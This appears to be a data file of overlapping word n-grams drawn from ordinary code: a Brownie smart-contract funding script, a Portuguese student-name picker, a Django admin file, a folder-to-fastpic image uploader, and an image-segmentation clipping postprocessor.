ngram
listlengths
0
82k
[ "\"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1] account = get_account()", "print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw():", "= FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def main(): fund()", "= get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if __name__", "fund(): fund_me = FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee()", "import FundMe from scripts.helpful_scripts import get_account def fund(): fund_me =", "account, \"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1] account =", "FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\")", "FundMe from scripts.helpful_scripts import get_account def fund(): fund_me = FundMe[-1]", "def withdraw(): fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account})", "print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1]", "fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def", "from brownie import FundMe from scripts.helpful_scripts import get_account def fund():", "import get_account def fund(): fund_me = FundMe[-1] account = get_account()", "is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me", "account}) def main(): fund() withdraw() if __name__ == \"__main__\": main()", "= FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is", "fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def main():", "{entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me =", "get_account def fund(): fund_me = FundMe[-1] account = get_account() entrance_fee", "account = get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if", "def fund(): fund_me = FundMe[-1] account = get_account() entrance_fee =", "withdraw(): fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def", "scripts.helpful_scripts import get_account def fund(): fund_me = FundMe[-1] account =", "get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account,", "FundMe[-1] account = get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw()", "fund_me.fund({\"from\": account, \"value\": entrance_fee}) def withdraw(): fund_me = FundMe[-1] account", "brownie import FundMe from scripts.helpful_scripts import get_account def fund(): fund_me", "fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if __name__ == \"__main__\":", "entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\":", "entrance_fee}) def withdraw(): fund_me = FundMe[-1] account = get_account() fund_me.withdraw({\"from\":", "= get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\":", "account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\")", "fund_me = FundMe[-1] account = get_account() entrance_fee = fund_me.getEntranceFee() print(f\"entrance", "= fund_me.getEntranceFee() print(f\"entrance is {entrance_fee}\") print(\"funding..\") fund_me.fund({\"from\": account, \"value\": entrance_fee})", "get_account() fund_me.withdraw({\"from\": account}) def main(): fund() withdraw() if __name__ ==", "from scripts.helpful_scripts import get_account def fund(): fund_me = FundMe[-1] account" ]
[ "um programa que ajude ele, lendo o nome dos alunos", "= input('Digite mais um nome: ') nome4 = input('Digite o", "último nome: ') nome = [nome1, nome2, nome3, nome4] print(choice(nome))", "nome3 = input('Digite mais um nome: ') nome4 = input('Digite", "') nome3 = input('Digite mais um nome: ') nome4 =", "sortear um dos seus quatro alunos para apagar o quadro.", "seus quatro alunos para apagar o quadro. Faça um programa", "escrevendo na tela o nome do escolhido. from random import", "e escrevendo na tela o nome do escolhido. from random", "random import choice nome1 = input('Digite um nome: ') nome2", "lendo o nome dos alunos e escrevendo na tela o", "dos seus quatro alunos para apagar o quadro. Faça um", "input('Digite mais um nome: ') nome4 = input('Digite o último", "outro nome: ') nome3 = input('Digite mais um nome: ')", "= input('Digite um nome: ') nome2 = input('Digite outro nome:", "ele, lendo o nome dos alunos e escrevendo na tela", "choice nome1 = input('Digite um nome: ') nome2 = input('Digite", "um nome: ') nome2 = input('Digite outro nome: ') nome3", "nome: ') nome4 = input('Digite o último nome: ') nome", "input('Digite o último nome: ') nome = [nome1, nome2, nome3,", "# Um professor quer sortear um dos seus quatro alunos", "= input('Digite outro nome: ') nome3 = input('Digite mais um", "nome: ') nome3 = input('Digite mais um nome: ') nome4", "o quadro. Faça um programa que ajude ele, lendo o", "Faça um programa que ajude ele, lendo o nome dos", "dos alunos e escrevendo na tela o nome do escolhido.", "um dos seus quatro alunos para apagar o quadro. Faça", "que ajude ele, lendo o nome dos alunos e escrevendo", "na tela o nome do escolhido. from random import choice", "quadro. Faça um programa que ajude ele, lendo o nome", "para apagar o quadro. Faça um programa que ajude ele,", "import choice nome1 = input('Digite um nome: ') nome2 =", "quatro alunos para apagar o quadro. Faça um programa que", "nome: ') nome2 = input('Digite outro nome: ') nome3 =", "nome do escolhido. from random import choice nome1 = input('Digite", "mais um nome: ') nome4 = input('Digite o último nome:", "tela o nome do escolhido. from random import choice nome1", "um nome: ') nome4 = input('Digite o último nome: ')", "ajude ele, lendo o nome dos alunos e escrevendo na", "Um professor quer sortear um dos seus quatro alunos para", "o nome dos alunos e escrevendo na tela o nome", "from random import choice nome1 = input('Digite um nome: ')", "input('Digite um nome: ') nome2 = input('Digite outro nome: ')", "') nome2 = input('Digite outro nome: ') nome3 = input('Digite", "o último nome: ') nome = [nome1, nome2, nome3, nome4]", "apagar o quadro. Faça um programa que ajude ele, lendo", "nome dos alunos e escrevendo na tela o nome do", "o nome do escolhido. from random import choice nome1 =", "nome1 = input('Digite um nome: ') nome2 = input('Digite outro", "= input('Digite o último nome: ') nome = [nome1, nome2,", "do escolhido. from random import choice nome1 = input('Digite um", "programa que ajude ele, lendo o nome dos alunos e", "') nome4 = input('Digite o último nome: ') nome =", "nome2 = input('Digite outro nome: ') nome3 = input('Digite mais", "input('Digite outro nome: ') nome3 = input('Digite mais um nome:", "alunos e escrevendo na tela o nome do escolhido. from", "alunos para apagar o quadro. Faça um programa que ajude", "nome4 = input('Digite o último nome: ') nome = [nome1,", "quer sortear um dos seus quatro alunos para apagar o", "escolhido. from random import choice nome1 = input('Digite um nome:", "professor quer sortear um dos seus quatro alunos para apagar" ]
[ "search_fields = ('name', 'last_name', 'phone') list_editable = ('phone', 'show') admin.site.register(Categoria)", "'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links = ('id', 'name',", "= 10 search_fields = ('name', 'last_name', 'phone') list_editable = ('phone',", "('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links =", "list_per_page = 10 search_fields = ('name', 'last_name', 'phone') list_editable =", "'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links = ('id', 'name', 'last_name')", "= ('name', 'last_name', 'phone') list_editable = ('phone', 'show') admin.site.register(Categoria) admin.site.register(Contact,", "list_filter = ('categoria',) list_per_page = 10 search_fields = ('name', 'last_name',", "from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id',", "'last_name') list_filter = ('categoria',) list_per_page = 10 search_fields = ('name',", "import admin from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display", "Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone',", "<filename>contacts/admin.py from django.contrib import admin from .models import Categoria, Contact", "'show') list_display_links = ('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page", "('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page = 10 search_fields", "= ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links", "'categoria', 'show') list_display_links = ('id', 'name', 'last_name') list_filter = ('categoria',)", "list_display_links = ('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page =", "10 search_fields = ('name', 'last_name', 'phone') list_editable = ('phone', 'show')", "django.contrib import admin from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin):", "('name', 'last_name', 'phone') list_editable = ('phone', 'show') admin.site.register(Categoria) admin.site.register(Contact, ContactAdmin)", "Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone', 'email',", "'creation_date', 'categoria', 'show') list_display_links = ('id', 'name', 'last_name') list_filter =", ".models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name',", "'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show') list_display_links = ('id',", "('categoria',) list_per_page = 10 search_fields = ('name', 'last_name', 'phone') list_editable", "class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date',", "import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name',", "list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show')", "admin from .models import Categoria, Contact class ContactAdmin(admin.ModelAdmin): list_display =", "= ('id', 'name', 'last_name') list_filter = ('categoria',) list_per_page = 10", "'email', 'creation_date', 'categoria', 'show') list_display_links = ('id', 'name', 'last_name') list_filter", "'name', 'last_name') list_filter = ('categoria',) list_per_page = 10 search_fields =", "ContactAdmin(admin.ModelAdmin): list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria',", "= ('categoria',) list_per_page = 10 search_fields = ('name', 'last_name', 'phone')", "from django.contrib import admin from .models import Categoria, Contact class" ]
[ "_n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file =", "= {} tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')(", "continue file_path = os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need", "link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep)", "file_path = os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload", "finished = datetime.datetime.now() print(finished, 'all done in', finished - started)", "in os.walk(folder_path): for file in files: if file.split('.')[-1] not in", "if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path", "delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set =", "codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key))", "print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started = datetime.datetime.now()", "codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set: result =", "result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__':", "file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result", "'result_codes.txt')) if __name__ == '__main__': started = datetime.datetime.now() print(started, 'started')", "joblib import Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload =", "tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload =", "pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for root, dirs, files", "encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in", "print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir =", "open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for", "_spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link =", "pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key,", "files in os.walk(folder_path): for file in files: if file.split('.')[-1] not", "shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8',", "pics_to_upload = {} for root, dirs, files in os.walk(folder_path): for", "'bmp', 'png'): continue file_path = os.path.join(root, file) pics_to_upload[file] = file_path", "for root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt'))", "datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now() print(finished, 'all done", "_root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key,", "'started') main() finished = datetime.datetime.now() print(finished, 'all done in', finished", "key in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] = sub_result[1]", "os.walk(folder_path): for file in files: if file.split('.')[-1] not in ('jpg',", "( '/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir):", "upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file", "tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url,", "{} tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key,", "codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set:", "codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in", "Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set", "pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link)", "for sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return", "root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if", "upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp() try:", "result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for root,", "result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path):", "started = datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now() print(finished,", "= Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload))", "as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if", "if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url))", "fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder',", "== '__main__': started = datetime.datetime.now() print(started, 'started') main() finished =", "finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w',", "codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file:", "in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root, file)", "in files: if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'):", "= file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result = {}", "codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep)", "main(): for root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder,", "tmp_dir) for key in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]]", "{} for root, dirs, files in os.walk(folder_path): for file in", "__name__ == '__main__': started = datetime.datetime.now() print(started, 'started') main() finished", "pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for sub_result in sub_results:", "import shutil import tempfile from joblib import Parallel, delayed from", "files: if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'): continue", "codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url,", "def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file:", "True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir)", "file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path =", "for key in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] =", "file in files: if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp',", "codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def", "tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key],", "backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for sub_result", "datetime import os import shutil import tempfile from joblib import", "upload_from_folder(folder_path): pics_to_upload = {} for root, dirs, files in os.walk(folder_path):", "from joblib import Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload", "('jpg', 'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root, file) pics_to_upload[file]", "return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for", "if __name__ == '__main__': started = datetime.datetime.now() print(started, 'started') main()", "tempfile from joblib import Parallel, delayed from fastpic_upload import upload_file_to_fastpic", "import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = ( '/path/to/folder', )", "root, dirs, files in os.walk(folder_path): for file in files: if", "= tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir)", "process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return", "tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for", "photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp() try: sub_results =", "for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link", "with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep)", "os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload)))", "url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main():", "os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started = datetime.datetime.now() print(started,", "for root, dirs, files in os.walk(folder_path): for file in files:", "Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for", "= upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started", "import os import shutil import tempfile from joblib import Parallel,", "pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def", "= os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {}", "sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result", "(pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {} for root, dirs,", "codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set: result", "print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload = {}", "'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key", "from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20 _root_folders_set = (", "= 20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file = True", "= ( '/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key, pic_path,", "= datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now() print(finished, 'all", "'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root, file) pics_to_upload[file] =", "import Parallel, delayed from fastpic_upload import upload_file_to_fastpic _n_jobs_for_upload = 20", "result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]')", "if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for", "codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file:", "for file in files: if file.split('.')[-1] not in ('jpg', 'jpeg',", "upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path): pics_to_upload", "shutil import tempfile from joblib import Parallel, delayed from fastpic_upload", "result = {} tmp_dir = tempfile.mkdtemp() try: sub_results = Parallel(n_jobs=_n_jobs_for_upload,", "{} photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp() try: sub_results", "sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir)", "result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep)", "print('Need upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir = tempfile.mkdtemp()", "= {} for root, dirs, files in os.walk(folder_path): for file", "url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]')", "file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result = {} tmp_dir", "sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in", "in sorted(pics_to_upload)) for sub_result in sub_results: result[sub_result[0]] = sub_result[1] finally:", "pics_to_upload[file] = file_path print(pics_to_upload) print('Need upload {} photo'.format(len(pics_to_upload))) result =", "_spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep) codes_file.write('[/spoiler]') def main(): for root_folder", "'__main__': started = datetime.datetime.now() print(started, 'started') main() finished = datetime.datetime.now()", "newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]') codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result):", "delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload)) for sub_result in", "main() finished = datetime.datetime.now() print(finished, 'all done in', finished -", "print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file: codes_file.write('[spoiler=\"Скриншоты\"]')", "_root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ ==", "result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link =", "in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key]", "return result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='')", "sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link,", "codes_file.write('[/spoiler]') def main(): for root_folder in _root_folders_set: result = upload_from_folder(root_folder)", "import tempfile from joblib import Parallel, delayed from fastpic_upload import", ") _spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link", "in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__", "upload_from_folder(root_folder) print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt')) if __name__ == '__main__': started =", "result def print_result_to_file(result, result_file_path): with open(result_file_path, 'w', encoding='utf8', newline='') as", "def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url)", "in sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result def", "= result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if _spoiler_for_each_file: codes_file.write(os.linesep) codes_file.write('[/spoiler]') codes_file.write(os.linesep) codes_file.write(os.linesep)", "dirs, files in os.walk(folder_path): for file in files: if file.split('.')[-1]", "= sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with", "20 _root_folders_set = ( '/path/to/folder', ) _spoiler_for_each_file = True def", "try: sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')( delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key", "sub_results: result[sub_result[0]] = sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result,", "'png'): continue file_path = os.path.join(root, file) pics_to_upload[file] = file_path print(pics_to_upload)", "print(started, 'started') main() finished = datetime.datetime.now() print(finished, 'all done in',", "= upload_file_to_fastpic(pic_path, tmp_dir) print(pic_url) return result_key, (pic_url, pic_link) def upload_from_folder(folder_path):", "def main(): for root_folder in _root_folders_set: result = upload_from_folder(root_folder) print_result_to_file(result,", "import datetime import os import shutil import tempfile from joblib", "def upload_from_folder(folder_path): pics_to_upload = {} for root, dirs, files in", "codes_file.write(os.linesep) codes_file.write(os.linesep) for result_key in sorted(result): if _spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep)", "os import shutil import tempfile from joblib import Parallel, delayed", "sub_result[1] finally: shutil.rmtree(tmp_dir) return result def print_result_to_file(result, result_file_path): with open(result_file_path,", "not in ('jpg', 'jpeg', 'bmp', 'png'): continue file_path = os.path.join(root,", "_spoiler_for_each_file: codes_file.write('[spoiler=\"{}\"]'.format(result_key)) codes_file.write(os.linesep) url, link = result[result_key] codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url)) if", "= True def process_one_pic(result_key, pic_path, tmp_dir): pic_url, pic_link = upload_file_to_fastpic(pic_path,", "'/path/to/folder', ) _spoiler_for_each_file = True def process_one_pic(result_key, pic_path, tmp_dir): pic_url," ]
[ "Corporation Licensed under the Apache License, Version 2.0 (the \"License\");", "permissions and limitations under the License. \"\"\" import numpy as", "greater than min_value') def process_image(self, annotation, prediction): for target in", "Unless required by applicable law or agreed to in writing,", "by applicable law or agreed to in writing, software distributed", ".postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config", "ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, )", "NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\")", "from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError", "software distributed under the License is distributed on an \"AS", "distributed under the License is distributed on an \"AS IS\"", "CONDITIONS OF ANY KIND, either express or implied. See the", "limitations under the License. \"\"\" import numpy as np from", "def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True,", "parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0,", "annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction:", "Version 2.0 (the \"License\"); you may not use this file", "if self.max_value < self.min_value: raise ConfigError('max_value should be greater than", "writing, software distributed under the License is distributed on an", "'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max", "not use this file except in compliance with the License.", "2.0 (the \"License\"); you may not use this file except", "Apache License, Version 2.0 (the \"License\"); you may not use", "copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable", "express or implied. See the License for the specific language", "NumberField, ConfigError class 